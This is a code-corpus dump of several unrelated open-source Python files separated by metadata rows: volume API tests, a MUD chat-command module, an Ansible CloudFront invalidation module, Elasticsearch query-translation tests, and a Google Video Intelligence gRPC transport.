"""Simple check that listing volumes works."""
volumes = self.api.get_volumes()
self.assertIsNotNone(volumes)
def test_create_and_delete_volume(self):
"""Creates and deletes a volume."""
# Create volume
created_volume = self.api.post_volume({'volume': {'size': 1}})
self.assertTrue(uuidutils.is_uuid_like(created_volume['id']))
created_volume_id = created_volume['id']
# Check it's there
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(self._vol_type_name, found_volume['volume_type'])
# It should also be in the all-volume list
volumes = self.api.get_volumes()
volume_names = [volume['id'] for volume in volumes]
self.assertIn(created_volume_id, volume_names)
# Wait (briefly) for creation. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['creating'])
# It should be available...
self.assertEqual('available', found_volume['status'])
# Delete the volume
self.api.delete_volume(created_volume_id)
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['deleting'])
# Should be gone
self.assertFalse(found_volume)
def test_create_volume_with_metadata(self):
"""Creates a volume with metadata."""
# Create volume
metadata = {'key1': 'value1',
'key2': 'value2'}
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'metadata': metadata}})
self.assertTrue(uuidutils.is_uuid_like(created_volume['id']))
created_volume_id = created_volume['id']
# Check it's there and metadata present
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(metadata, found_volume['metadata'])
def test_create_volume_in_availability_zone(self):
"""Creates a volume in availability_zone."""
# Create volume
availability_zone = 'nova'
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'availability_zone': availability_zone}})
self.assertTrue(uuidutils.is_uuid_like(created_volume['id']))
created_volume_id = created_volume['id']
# Check it's there and availability zone present
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(availability_zone, found_volume['availability_zone'])
def test_create_and_update_volume(self):
# Create vol1
created_volume = self.api.post_volume({'volume': {
'size': 1, 'name': 'vol1'}})
self.assertEqual('vol1', created_volume['name'])
created_volume_id = created_volume['id']
# update volume
body = {'volume': {'name': 'vol-one'}}
updated_volume = self.api.put_volume(created_volume_id, body)
self.assertEqual('vol-one', updated_volume['name'])
# check for update
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual('vol-one', found_volume['name'])
| apache-2.0 | 4,194,754,191,102,223,000 | 38.09375 | 79 | 0.635092 | false |
genzgd/Lampost-Mud | lampmud/mud/chat.py | 1 | 1548 | from lampost.gameops.action import ActionError
from lampost.di.resource import Injected, module_inject
from lampmud.mud.action import mud_action
sm = Injected('session_manager')
module_inject(__name__)
@mud_action('emote', target_class='cmd_str')
def emote(source, target):
source.broadcast(raw="{}{} {}".format('' if source.imm_level else ':', source.name, target))
@mud_action('tell', target_class="player_online", obj_class="cmd_str")
def tell(source, target, obj):
tell_message(source, target, obj)
def tell_message(source, player, statement):
if not statement:
return source.display_line("Say what to " + player.name + "?")
player.last_tell = source.dbo_id
player.display_line(source.name + " tells you, `" + statement + "'", 'tell_from')
source.display_line("You tell " + player.name + ", `" + statement + "'", 'tell_to')
@mud_action('reply', target_class='cmd_str')
def reply(source, target):
if not source.last_tell:
raise ActionError("You have not received a tell recently.")
session = sm.player_session(source.last_tell)
if session:
tell_message(source, session.player, target)
else:
source.last_tell = None
return source.display_line("{} is no longer logged in".format(source.last_tell))
@mud_action('say', target_class='cmd_str')
def say(source, target):
source.display_line("You say, `{}'".format(target), display='say')
source.broadcast(raw="{} says, `{}'".format(source.name, target),
display='say', silent=True)
| mit | 6,273,739,487,291,257,000 | 35 | 96 | 0.662791 | false |
Lujeni/ansible | lib/ansible/modules/cloud/amazon/cloudfront_invalidation.py | 1 | 10548 | #!/usr/bin/python
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cloudfront_invalidation
short_description: create invalidations for AWS CloudFront distributions
description:
- Allows for invalidation of a batch of paths for a CloudFront distribution.
requirements:
- boto3 >= 1.0.0
- python >= 2.6
version_added: "2.5"
author: Willem van Ketwich (@wilvk)
extends_documentation_fragment:
- aws
- ec2
options:
distribution_id:
description:
- The ID of the CloudFront distribution to invalidate paths for. Can be specified instead of the alias.
required: false
type: str
alias:
description:
- The alias of the CloudFront distribution to invalidate paths for. Can be specified instead of distribution_id.
required: false
type: str
caller_reference:
description:
- A unique reference identifier for the invalidation paths.
- Defaults to current datetime stamp.
required: false
default:
type: str
target_paths:
description:
- A list of paths on the distribution to invalidate. Each path should begin with '/'. Wildcards are allowed. eg. '/foo/bar/*'
required: true
type: list
elements: str
notes:
- does not support check mode
'''
EXAMPLES = '''
- name: create a batch of invalidations using a distribution_id for a reference
cloudfront_invalidation:
distribution_id: E15BU8SDCGSG57
caller_reference: testing 123
target_paths:
- /testpathone/test1.css
- /testpathtwo/test2.js
- /testpaththree/test3.ss
- name: create a batch of invalidations using an alias as a reference and one path using a wildcard match
cloudfront_invalidation:
alias: alias.test.com
caller_reference: testing 123
target_paths:
- /testpathone/test4.css
- /testpathtwo/test5.js
- /testpaththree/*
'''
RETURN = '''
invalidation:
description: The invalidation's information.
returned: always
type: complex
contains:
create_time:
description: The date and time the invalidation request was first made.
returned: always
type: str
sample: '2018-02-01T15:50:41.159000+00:00'
id:
description: The identifier for the invalidation request.
returned: always
type: str
sample: I2G9MOWJZFV612
invalidation_batch:
description: The current invalidation information for the batch request.
returned: always
type: complex
contains:
caller_reference:
description: The value used to uniquely identify an invalidation request.
returned: always
type: str
sample: testing 123
paths:
description: A dict that contains information about the objects that you want to invalidate.
returned: always
type: complex
contains:
items:
description: A list of the paths that you want to invalidate.
returned: always
type: list
sample:
- /testpathtwo/test2.js
- /testpathone/test1.css
- /testpaththree/test3.ss
quantity:
description: The number of objects that you want to invalidate.
returned: always
type: int
sample: 3
status:
description: The status of the invalidation request.
returned: always
type: str
sample: Completed
location:
description: The fully qualified URI of the distribution and invalidation batch request.
returned: always
type: str
sample: https://cloudfront.amazonaws.com/2017-03-25/distribution/E1ZID6KZJECZY7/invalidation/I2G9MOWJZFV622
'''
from ansible.module_utils.ec2 import get_aws_connection_info
from ansible.module_utils.ec2 import ec2_argument_spec, boto3_conn
from ansible.module_utils.ec2 import snake_dict_to_camel_dict
from ansible.module_utils.ec2 import camel_dict_to_snake_dict
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.aws.cloudfront_facts import CloudFrontFactsServiceManager
import datetime
try:
from botocore.exceptions import ClientError, BotoCoreError
except ImportError:
pass # caught by imported AnsibleAWSModule
class CloudFrontInvalidationServiceManager(object):
"""
Handles CloudFront service calls to AWS for invalidations
"""
def __init__(self, module):
self.module = module
self.create_client('cloudfront')
def create_client(self, resource):
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(self.module, boto3=True)
self.client = boto3_conn(self.module, conn_type='client', resource=resource, region=region, endpoint=ec2_url, **aws_connect_kwargs)
def create_invalidation(self, distribution_id, invalidation_batch):
current_invalidation_response = self.get_invalidation(distribution_id, invalidation_batch['CallerReference'])
try:
response = self.client.create_invalidation(DistributionId=distribution_id, InvalidationBatch=invalidation_batch)
response.pop('ResponseMetadata', None)
if current_invalidation_response:
return response, False
else:
return response, True
except BotoCoreError as e:
self.module.fail_json_aws(e, msg="Error creating CloudFront invalidations.")
except ClientError as e:
if ('Your request contains a caller reference that was used for a previous invalidation batch '
'for the same distribution.' in e.response['Error']['Message']):
self.module.warn("InvalidationBatch target paths are not modifiable. "
"To make a new invalidation please update caller_reference.")
return current_invalidation_response, False
else:
self.module.fail_json_aws(e, msg="Error creating CloudFront invalidations.")
def get_invalidation(self, distribution_id, caller_reference):
current_invalidation = {}
# find all invalidations for the distribution
try:
paginator = self.client.get_paginator('list_invalidations')
invalidations = paginator.paginate(DistributionId=distribution_id).build_full_result().get('InvalidationList', {}).get('Items', [])
invalidation_ids = [inv['Id'] for inv in invalidations]
except (BotoCoreError, ClientError) as e:
self.module.fail_json_aws(e, msg="Error listing CloudFront invalidations.")
# check if there is an invalidation with the same caller reference
for inv_id in invalidation_ids:
try:
invalidation = self.client.get_invalidation(DistributionId=distribution_id, Id=inv_id)['Invalidation']
caller_ref = invalidation.get('InvalidationBatch', {}).get('CallerReference')
except (BotoCoreError, ClientError) as e:
self.module.fail_json_aws(e, msg="Error getting CloudFront invalidation {0}".format(inv_id))
if caller_ref == caller_reference:
current_invalidation = invalidation
break
current_invalidation.pop('ResponseMetadata', None)
return current_invalidation
class CloudFrontInvalidationValidationManager(object):
"""
Manages CloudFront validations for invalidation batches
"""
def __init__(self, module):
self.module = module
self.__cloudfront_facts_mgr = CloudFrontFactsServiceManager(module)
def validate_distribution_id(self, distribution_id, alias):
try:
if distribution_id is None and alias is None:
self.module.fail_json(msg="distribution_id or alias must be specified")
if distribution_id is None:
distribution_id = self.__cloudfront_facts_mgr.get_distribution_id_from_domain_name(alias)
return distribution_id
except (ClientError, BotoCoreError) as e:
self.module.fail_json_aws(e, msg="Error validating parameters.")
def create_aws_list(self, invalidation_batch):
aws_list = {}
aws_list["Quantity"] = len(invalidation_batch)
aws_list["Items"] = invalidation_batch
return aws_list
def validate_invalidation_batch(self, invalidation_batch, caller_reference):
try:
if caller_reference is not None:
valid_caller_reference = caller_reference
else:
valid_caller_reference = datetime.datetime.now().isoformat()
valid_invalidation_batch = {
'paths': self.create_aws_list(invalidation_batch),
'caller_reference': valid_caller_reference
}
return valid_invalidation_batch
except (ClientError, BotoCoreError) as e:
self.module.fail_json_aws(e, msg="Error validating invalidation batch.")
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
caller_reference=dict(),
distribution_id=dict(),
alias=dict(),
target_paths=dict(required=True, type='list')
))
module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=False, mutually_exclusive=[['distribution_id', 'alias']])
validation_mgr = CloudFrontInvalidationValidationManager(module)
service_mgr = CloudFrontInvalidationServiceManager(module)
caller_reference = module.params.get('caller_reference')
distribution_id = module.params.get('distribution_id')
alias = module.params.get('alias')
target_paths = module.params.get('target_paths')
result = {}
distribution_id = validation_mgr.validate_distribution_id(distribution_id, alias)
valid_target_paths = validation_mgr.validate_invalidation_batch(target_paths, caller_reference)
valid_pascal_target_paths = snake_dict_to_camel_dict(valid_target_paths, True)
result, changed = service_mgr.create_invalidation(distribution_id, valid_pascal_target_paths)
module.exit_json(changed=changed, **camel_dict_to_snake_dict(result))
if __name__ == '__main__':
main()
| gpl-3.0 | 2,975,625,500,619,000,000 | 36.140845 | 143 | 0.664865 | false |
trustedanalytics/data-catalog | tests/test_query_translation.py | 1 | 16431 | #
# Copyright (c) 2015 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import unittest
from ddt import ddt, data, unpack
from data_catalog.query_translation import ElasticSearchQueryTranslator, \
ElasticSearchFilterExtractor, ElasticSearchBaseQueryCreator, InvalidQueryError
from unittest import TestCase
@ddt
class FilterExtractorTests(TestCase):
def setUp(self):
self.filter_extractor = ElasticSearchFilterExtractor()
# first uuids (list), then input filters (list),
# then output query filters (json)
# then output post_filters (json)
# then dataset_filtering value (True, False, None)
example_singleFilter_org = (
['org-id-001'],
[{'format': ['csv']}],
{
'or': [
{'term': {'orgUUID': 'org-id-001'}},
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'term': {'format': 'csv'}}
]
},
None
)
example_singleFilter_onlyPublic = (
['org-id-001'],
[{'format': ['csv']}],
{
'and': [
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'term': {'format': 'csv'}}
]
},
True
)
example_singleFilter_onlyPrivate = (
['org-id-001'],
[{'format': ['csv']}],
{
'and': [
{'term': {'orgUUID': 'org-id-001'}},
{'term': {'isPublic': 'false'}}
]
},
{
'and': [
{'term': {'format': 'csv'}}
]
},
False
)
example_multivaluedFilterQuery_org = (
['org-id-002'],
[
{'category': ['health', 'finance']}
],
{
'or': [
{'term': {'orgUUID': 'org-id-002'}},
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'terms': {'category': ['health', 'finance']}}
]
},
None
)
example_multivaluedFilterQuery_onlyPublic = (
['org-id-002'],
[
{'category': ['health', 'finance']}
],
{
'and': [
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'terms': {'category': ['health', 'finance']}}
]
},
True
)
example_multivaluedFilterQuery_onlyPrivate = (
['org-id-002'],
[
{'category': ['health', 'finance']}
],
{
'and': [
{'term': {'orgUUID': 'org-id-002'}},
{'term': {'isPublic': 'false'}}
]
},
{
'and': [
{'terms': {'category': ['health', 'finance']}}
]
},
False
)
example_multipleFilterQuery_org = (
['org-id-003'],
[
{'format': ['csv']},
{'category': ['health']}
],
{
'or': [
{'term': {'orgUUID': 'org-id-003'}},
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'term': {'format': 'csv'}},
{'term': {'category': 'health'}}
]
},
None
)
example_multipleFilterQuery_onlyPublic = (
['org-id-003'],
[
{'format': ['csv']},
{'category': ['health']}
],
{
'and': [
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'term': {'format': 'csv'}},
{'term': {'category': 'health'}}
]
},
True
)
example_multipleFilterQuery_onlyPrivate = (
['org-id-003'],
[
{'format': ['csv']},
{'category': ['health']}
],
{
'and': [
{'term': {'orgUUID': 'org-id-003'}},
{'term': {'isPublic': 'false'}}
]
},
{
'and': [
{'term': {'format': 'csv'}},
{'term': {'category': 'health'}}
]
},
False
)
example_upperCaseFilterValue_org = (
['org-id-004'],
[
{'format': ['CSV']}
],
{
'or': [
{'term': {'orgUUID': 'org-id-004'}},
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'term': {'format': 'csv'}}
]
},
None
)
example_upperCaseFilterValue_onlyPublic = (
['org-id-004', 'public'],
[
{'format': ['CSV']}
],
{
'and': [
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'term': {'format': 'csv'}}
]
},
True
)
example_upperCaseFilterValue_onlyPrivate = (
['org-id-004'],
[
{'format': ['CSV']}
],
{
'and': [
{'term': {'orgUUID': 'org-id-004'}},
{'term': {'isPublic': 'false'}}
]
},
{
'and': [
{'term': {'format': 'csv'}}
]
},
False
)
example_fromToTimeQuery_org = (
['org-id-005'],
[
{'creationTime': ['2014-05-18', '2014-11-03']}
],
{
'and': [
{'range': {'creationTime': {'from': '2014-05-18', 'to': '2014-11-03'}}},
{
'or': [
{'term': {'orgUUID': 'org-id-005'}},
{'term': {'isPublic': 'true'}}
]
}
]
},
{},
None
)
example_fromToTimeQuery_onlyPublic = (
['org-id-005'],
[
{'creationTime': ['2014-05-18', '2014-11-03']}
],
{
'and': [
{'range': {'creationTime': {'from': '2014-05-18', 'to': '2014-11-03'}}},
{'term': {'isPublic': 'true'}}
]
},
{},
True
)
example_fromToTimeQuery_onlyPrivate = (
['org-id-005'],
[
{'creationTime': ['2014-05-18', '2014-11-03']}
],
{
'and': [
{'range': {'creationTime': {'from': '2014-05-18', 'to': '2014-11-03'}}},
{'term': {'orgUUID': 'org-id-005'}},
{'term': {'isPublic': 'false'}}
]
},
{},
False
)
example_beforeTimeQuery_org = (
['org-id-006'],
[
{'creationTime': [-1, '2014-11-03']}
],
{
'and': [
{'range': {'creationTime': {'to': '2014-11-03'}}},
{
'or': [
{'term': {'orgUUID': 'org-id-006'}},
{'term': {'isPublic': 'true'}}
]
}
]
},
{},
None
)
example_afterTimeQuery_org = (
['org-id-007'],
[
{'creationTime': ['2014-05-18', -1]}
],
{
'and': [
{'range': {'creationTime': {'from': '2014-05-18'}}},
{
'or': [
{'term': {'orgUUID': 'org-id-007'}},
{'term': {'isPublic': 'true'}}
]
}
]
},
{},
None
)
@data(example_singleFilter_org,
example_singleFilter_onlyPublic,
example_singleFilter_onlyPrivate,
example_multivaluedFilterQuery_org,
example_multivaluedFilterQuery_onlyPublic,
example_multivaluedFilterQuery_onlyPrivate,
example_multipleFilterQuery_org,
example_multipleFilterQuery_onlyPublic,
example_multipleFilterQuery_onlyPrivate,
example_upperCaseFilterValue_org,
example_upperCaseFilterValue_onlyPublic,
example_upperCaseFilterValue_onlyPrivate,
example_fromToTimeQuery_org,
example_fromToTimeQuery_onlyPublic,
example_fromToTimeQuery_onlyPrivate,
example_beforeTimeQuery_org,
example_afterTimeQuery_org
)
@unpack
def test_filterExtraction_properFilter_filterExtracted(self,
org_uuid_list,
input_filters,
query_filters,
post_filters,
dataset_filtering):
self._assert_filter_extraction_ddt(org_uuid_list,
input_filters,
query_filters,
post_filters,
dataset_filtering)
example_nonListAsFilterValues = (
{'filters': [{'filter name': 'filter value'}]},
['org-id-008'],
True
)
example_nonDictAsFilter = (
{'filters': ['not a dictionary']},
['org-id-09'],
True
)
example_invalidFilterName = (
{'filters': [{'nonexistent_mapping_field': ['some value']}]},
['org-id-010'],
True
)
example_wrongNumberTimeParameters = (
{'filters': [{'creationTime': ['2014-11-03', '2014-11-04', '2014-11-05']}]},
['org-id-011'],
True
)
# @data(example_nonListAsFilterValues,
# example_nonDictAsFilter,
# example_invalidFilterName,
# example_wrongNumberTimeParameters)
# @unpack
# def test_filterExtractionErrors_improperFilter_invalidQueryError(self,
# invalid_filters,
# org_uuid_list,
# dataset_filtering):
# with self.assertRaises(InvalidQueryError):
# self.filter_extractor.extract_filter(invalid_filters, org_uuid_list, dataset_filtering)
def _assert_filter_extraction_ddt(self,
org_uuid_list,
input_filters,
test_query_filter,
test_post_filter,
dataset_filtering):
"""input_filters -- Dictionary of list of dictionaries in a form:
{'filters': [
{filter_name: [filter_value_1, ...]},
{filter_name2: [filter_value_2_1, ...]}
]}"""
filters = {'filters': input_filters}
output_filter, post_filter = self.filter_extractor.extract_filter(filters, org_uuid_list, dataset_filtering, False)
self.assertDictEqual(test_query_filter, output_filter)
self.assertDictEqual(test_post_filter, post_filter)
class ElasticSearchBaseQueryCreationTests(TestCase):
MATCH_ALL = {'match_all': {}}
def setUp(self):
self.query_creator = ElasticSearchBaseQueryCreator()
def test_baseQueryCreation_textQueryProvided_baseQueryCreated(self):
TEXT = 'some text query'
proper_base_query = {
'bool': {
'should': [
{
'wildcard': {
'title': {
'value': '*{}*'.format(TEXT),
'boost': 3
}
}
},
{
'match': {
'dataSample': {
'query': TEXT,
'boost': 2
}
}
},
{
'match': {
'sourceUri': {
'query': TEXT,
}
}
}
]
}
}
self.assertDictEqual(
proper_base_query,
self.query_creator.create_base_query({'query': TEXT}))
def test_baseQueryCreation_noQueryElement_matchAllReturned(self):
self.assertDictEqual(
self.MATCH_ALL,
self.query_creator.create_base_query({}))
def test_baseQueryCreation_emptyQuery_matchAllReturned(self):
self.assertDictEqual(
self.MATCH_ALL,
self.query_creator.create_base_query({'query': ''}))
class ElasticSearchQueryTranslationTests(TestCase):
def setUp(self):
self.translator = ElasticSearchQueryTranslator()
self.org_uuid = ['orgid007']
def test_queryTranslation_sizeInQuery_sizeAddedToOutput(self):
SIZE = 123
size_query = json.dumps({'size': SIZE})
translated_query = self.translator.translate(size_query, self.org_uuid, None, False)
self.assertEqual(SIZE, json.loads(translated_query)['size'])
def test_queryTranslation_fromInQuery_fromAddedToOutput(self):
FROM = 345
from_query = json.dumps({'from': FROM})
translated_query = self.translator.translate(from_query, self.org_uuid, True, False)
self.assertEqual(FROM, json.loads(translated_query)['from'])
def test_combiningQueryAndFilter_queryWithFilter_filteredQueryCreated(self):
FAKE_BASE_QUERY = {'yup': 'totally fake'}
FAKE_FILTER = {'uhuh': 'this filter is also fake'}
FAKE_POST_FILTER = {'hello': 'fake filter'}
expected_query = {
'query': {
'filtered': {
'filter': FAKE_FILTER,
'query': FAKE_BASE_QUERY
}
},
'post_filter': FAKE_POST_FILTER,
'aggregations': {
'categories': {
'terms': {
'size': 100,
'field': 'category'
}
},
'formats': {
'terms': {
'field': 'format'
}
}
}
}
output_query = self.translator._combine_query_and_filters(FAKE_BASE_QUERY, FAKE_FILTER, FAKE_POST_FILTER)
self.assertDictEqual(expected_query, output_query)
def test_queryTranslation_queryIsNotJson_invalidQueryError(self):
with self.assertRaises(InvalidQueryError):
self.translator.translate('{"this is not a proper JSON"}', self.org_uuid, None, False)
def test_decodingInputQuery_noneQuery_emptyDictReturned(self):
self.assertDictEqual(
{},
self.translator._get_query_dict(None))
def test_queryTranslation_fullFeaturedQuery_queryTranslated(self):
input_query = {
'query': 'blabla',
'filters': [
{'format': ['csv']}
],
'size': 3,
'from': 14
}
output_query_string = self.translator.translate(json.dumps(input_query), self.org_uuid, True, False)
output_query = json.loads(output_query_string)
self.assertIn('filtered', output_query['query'])
self.assertIn('size', output_query)
self.assertIn('from', output_query)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 1,777,149,651,204,844,000 | 27.775832 | 123 | 0.421581 | false |
googleapis/googleapis-gen | google/cloud/videointelligence/v1p1beta1/videointelligence-v1p1beta1-py/google/cloud/videointelligence_v1p1beta1/services/video_intelligence_service/transports/grpc_asyncio.py | 1 | 12936 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import packaging.version
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.videointelligence_v1p1beta1.types import video_intelligence
from google.longrunning import operations_pb2 # type: ignore
from .base import VideoIntelligenceServiceTransport, DEFAULT_CLIENT_INFO
from .grpc import VideoIntelligenceServiceGrpcTransport
class VideoIntelligenceServiceGrpcAsyncIOTransport(VideoIntelligenceServiceTransport):
"""gRPC AsyncIO backend transport for VideoIntelligenceService.
Service that implements Google Cloud Video Intelligence API.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'videointelligence.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
def __init__(self, *,
host: str = 'videointelligence.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or applicatin default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsAsyncClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Sanity check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsAsyncClient(
self.grpc_channel
)
# Return the client from cache.
return self._operations_client
@property
def annotate_video(self) -> Callable[
[video_intelligence.AnnotateVideoRequest],
Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the annotate video method over gRPC.
Performs asynchronous video annotation. Progress and results can
be retrieved through the ``google.longrunning.Operations``
interface. ``Operation.metadata`` contains
``AnnotateVideoProgress`` (progress). ``Operation.response``
contains ``AnnotateVideoResponse`` (results).
Returns:
Callable[[~.AnnotateVideoRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'annotate_video' not in self._stubs:
self._stubs['annotate_video'] = self.grpc_channel.unary_unary(
'/google.cloud.videointelligence.v1p1beta1.VideoIntelligenceService/AnnotateVideo',
request_serializer=video_intelligence.AnnotateVideoRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs['annotate_video']
__all__ = (
'VideoIntelligenceServiceGrpcAsyncIOTransport',
)
| apache-2.0 | -4,601,164,260,622,470,700 | 45.365591 | 99 | 0.619125 | false |
